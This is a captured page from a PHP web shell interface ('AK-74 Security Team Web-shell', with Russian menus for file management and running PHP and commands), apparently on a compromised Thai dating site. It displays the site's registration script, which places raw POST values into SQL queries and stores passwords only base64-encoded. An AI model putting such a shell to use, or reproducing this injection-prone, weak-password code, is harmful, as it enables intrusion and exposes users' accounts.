.:: :[ AK-74 Security Team Web-shell ]: ::.

Общая информация Файловый менеджер phpinfo() Выполнить PHP Выполнить команду

Редактирование файла

<?php include("include/config.php"); include("include/connect.php"); include("include/function.php"); //require_once('PHPMailer/class.phpmailer.php'); header("Content-Type: text/html; charset=utf-8"); /*if (isset($_COOKIE["$configCookieNameBan"])) { ?> <script language="javascript"> alert('IP นี้ถูก Ban ไม่สามารถใช้งานระบบได้'); window.location = '<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); }*/ /*if (!checkBandIP($_SERVER['REMOTE_ADDR'])) { setcookie($configCookieNameBan, 'Ban', time()+3600*60*24*30*3); ?> <script language="javascript"> alert('IP นี้ถูก Ban ไม่สามารถใช้งานระบบได้'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); }*/ if (!checkBandEmail($_POST['email'])) { ?> <script language="javascript"> alert('Email ของคุณไม่สามารถใช้งานกับเว็บไซต์นี้ได้\nเนื่องจาก Email นี้ถูก Ban'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); } // end if (!checkBandEmail($_POST['email'])) { $tbl_name = 'member'; $fieldlist = array('image','username','password','email','register_date','activate_date','camera','gender','age','province','birthday','hi5_link','facebook_link','active_status','enews_receive'); if ( (trim($_POST['username'])=='') || (trim($_POST['password'])=='') || (!check_full($_POST['username'])) || (trim($_POST['password'])=='') || (!isemail($_POST['email'])) ) { ?> <script language="javascript"> alert('ข้อมูลไม่ครบ ไม่สามารถดำเนินการต่อได้'); window.location = 'register.php'; </script> <?php exit(); } else { $error = false; $sql = " SELECT count(member_id) AS num FROM $tbl_name WHERE username = '".$_POST['username']."' "; $query = sql_query($sql); $rec = sql_fetch_array($query); if ($rec['num'] > 0) { ?> <script language="javascript"> alert('Username นี้มีการใช้ในการสมัครสมาชิกแล้ว !'); </script> <?php $error = true; } // end if ($rec['num'] > 0) if (!$error) { $sql = " SELECT count(member_id) AS num FROM $tbl_name WHERE email = '".$_POST['email']."' "; $query = sql_query($sql); $rec = sql_fetch_array($query); if ($rec['num'] > 0) { ?> <script language="javascript"> alert('Email นี้มีการใช้ในการสมัครสมาชิกแล้ว !'); </script> <?php $error = true; } // end if ($rec['num'] > 0) } // end if ($error) { if ($error) { $_SESSION['s_formLogin_username'] = $_POST['username']; $_SESSION['s_formLogin_email'] = $_POST['email']; $_SESSION['s_formLogin_byear'] = $_POST['byear']; $_SESSION['s_formLogin_bmonth'] = $_POST['bmonth']; $_SESSION['s_formLogin_bdate'] = $_POST['bdate']; ?> <script language="javascript"> window.location = 'register.php'; </script> <?php exit(); } // end if ($error) $_POST['birthday'] = $_POST['byear'].'-'.$_POST['bmonth'].'-'.$_POST['bdate']; $aData = explode('-', calage($_POST['birthday'])); $_POST['age'] = $aData[0]; $_POST['password'] = base64_encode($_POST['password']); $_POST['register_date'] = date("Y-m-d H:i:s"); // ==== > Start เช็คว่าต้องยืนยันการ Active จาก Email หรือเปล่า $sql = " SELECT register_active FROM config_system WHERE config_system_id = 1 "; $query = sql_query($sql); $rec = sql_fetch_array($query); $register_active = $rec['register_active']; if ($register_active == 0) { // ปิดระบบ ไม่ต้องยืนยันจาก Email $_POST['active_status'] = 1; $_POST['activate_date'] = $_POST['register_date']; } // ==== > Stop เช็คว่าต้องยืนยันการ Active จาก Email หรือเปล่า include('include/m_add.php'); if ($register_active == 1) { $to = $_POST['email']; $subject = 'ยืนยันการสมัครสมาชิก '.$webmasterName; $message = 'สวัสดีครับ ยินดีต้อนรับสู่ MSN Ladyboy dot Com<br /> <br /> ยืนยันการสมัครสมาชิก &nbsp;&nbsp;&nbsp;<a href="'.$configWebsiteName.'activeMember.php?mid='.base64_encode($id).'&email='.base64_encode($to).'"><font size="5">กรุณาคลิ๊ก</font></a><br /> <br /> หรือคลิกที่นี่ <a href="'.$configWebsiteName.'activeMember.php?mid='.base64_encode($id).'&email='.base64_encode($to).'">'.$configWebsiteName.'activeMember.php?mid='.base64_encode($id).'&email='.base64_encode($to).'</a> <br /> <br /> ด้วยความเคารพอย่างสูง<br /> MSN Ladyboy dot Com<br /> '.$configWebsiteName; $fromname = $webmasterName; $frommail = $webmasterMail; sendMailEncode($to, $fromname, $frommail, $subject, $message, $cType='html',$CC="",$BCC="",$attach="",$attach_name=""); //sendMailFactory($to, $frommail, $subject, $message, $attchPath, $attchName, $replyTo, $includeFileMail); ?> <script language="javascript"> alert('ขณะนี้ระบบได้ส่งอีเมล์ยืนยันการสมัครสมาชิกไปยังอีเมล์ของท่านแล้ว (<?php echo $_POST['email']?>)\nกรุณาคลิ๊กลิงค์ที่อยู่ในอีเมล์ดังกล่าวเพื่อให้การสมัครสมาชิกเสร็จสมบูรณ์ครับ\nกรุณาตรวจสอบใน Junk Box และ Spam Box ด้วยครับ'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php } else { // end if ($register_active == 1) { $_SESSION['s_member_id'] = $id; ?> <script language="javascript"> alert('การสมัครสมาชิกเสร็จสมบูรณ์\nยินดีต้อนรับสู่ <?php echo $webmasterName?>\n\n* ชื่อบัญชีที่ท่านสมัครนี้ สามารถใช้ Login เพื่อโพสต์ข้อความได้ในครั้งต่อๆไป *'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php } // end == if ($register_active == 1) { } // end if ((trim($_POST['username'])=='') || (trim($_POST['password'])=='') || (trim($_POST['password'])=='')) { ?> Rename: -

Время генерации: 0.00019097328186035